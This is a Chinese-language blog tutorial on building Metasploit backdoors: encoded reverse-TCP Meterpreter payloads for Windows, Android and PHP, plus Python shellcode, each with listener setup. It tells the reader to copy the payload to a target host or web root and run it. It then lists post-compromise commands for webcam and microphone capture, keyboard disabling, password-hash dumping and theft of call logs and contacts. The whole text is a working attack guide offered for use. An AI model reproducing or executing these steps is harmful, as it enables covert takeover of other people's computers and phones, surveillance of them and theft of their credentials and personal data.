生成windows后门

 

1.首先生成后门

  1. [root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe

2.进入Metasploit,执行以下操作

  1.  
  1. msf > use exploit/multi/handler
  2. msf exploit(multi/handler) > 

  1. msf exploit(multi/handler) > set payload windows/meterpreter/    reverse_tcp
  2. payload => windows/meterpreter/reverse_tcp

  1. msf exploit(multi/handler) > set lhost 192.168.1.25
  1. lhost => 192.168.1.25
  2. msf exploit(multi/handler) > set lport 6666
  3. lport => 6666

  1. msf exploit(multi/handler) > exploit 
  3. [*] Started reverse TCP handler on 192.168.1.25:6666 
  4. [*] Sending stage (179779 bytes) to 192.168.1.10
  5. [*] Meterpreter session 1 opened (192.168.1.25:6666 -> 192.168.1.10:54264) at 2018-06-02 02:24:17 -0400

3.将我们的(lyshark.exe)拷贝到目标主机并运行

 

4.攻陷后常用查询命令

ps         #查看进程
migrate      #注入进程
run vnc      #查看远程桌面

cat        #查看文件
edit        #编辑文件
upload      #上传文件
download      #下载文件
rm        #删除文件
mkdir      #创建文件夹
rmdir      #删除文件夹

sessions -l  #查看会话
backgroud    #退出当前会话

enumdesktops          #在线用户数
uictl disable keyboard   #让键盘失效
uictl enable keyboard     #恢复键盘
record_mic -d 10       #音频录制
webcam_stream        #开启摄像头
screenshot          #桌面抓图
sysinfo          #系统信息查询
getsystem          #获取最高权限
hashdump          #密码hash

 

生成Android后门

1.首先生成后门

  1. [root@localhost ~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 R > ./lyshark.apk

 

2.进入Metasploit,执行以下操作

  1. msf > use exploit/multi/handler 
  2. msf exploit(multi/handler) > 
  4. msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
  5. payload => android/meterpreter/reverse_tcp
  7. msf exploit(multi/handler) > set lhost 192.168.1.1
  8. lhost => 192.168.1.1
  9. msf exploit(multi/handler) > set lport 6666
  10. lport => 6666
  11. msf exploit(multi/handler) > exploit 
  13. [-] Handler failed to bind to 192.168.1.1:6666:-  -
  14. [*] Started reverse TCP handler on 0.0.0.0:6666

 

3.将我们的(lyshark.apk)拷贝到目标主机并运行

4.此时主机已经沦陷,查看一下系统吧

  1. 常用命令:
  2. search                     #搜索 search -f *.jpg
  3. download
  4. webcam_stream -i 1/2       #打开前置或后置摄像头
  5. check_root                 #检测root
  6. dump_calllog               #下载电话记录
  7. dump_contacts              #下载信息记录
  8. geolocate                  #定位,需要下载谷歌地图

 

生成php后门

1.首先生成后门

  1. [root@localhost ~]# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.1 lport=6666 -f raw > ./lyshark.php

 

2.进入Metasploit,执行以下操作

  1. msf > use exploit/multi/handler 
  2. msf exploit(multi/handler) > 
  4. msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
  5. payload => php/meterpreter_reverse_tcp
  7. msf exploit(multi/handler) > set lhost 192.168.1.1
  8. lhost => 192.168.1.1
  9. msf exploit(multi/handler) > set lport 6666
  10. lport => 6666
  11. msf exploit(multi/handler) > exploit -j
  12. [*] Exploit running as background job 0.
  13. msf exploit(multi/handler) > 
  14. [-] Handler failed to bind to 192.168.1.1:6666:-  -
  15. [*] Started reverse TCP handler on 0.0.0.0:6666

 

3.将我们的(lyshark.php)拷贝到目标网页根路径

 

生成shellcode

1.生成shell    <-e 使用编码 – i 编码次数>

  1. [root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f py > lyshark.py

版权声明:本文为LyShark原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/LyShark/p/9125335.html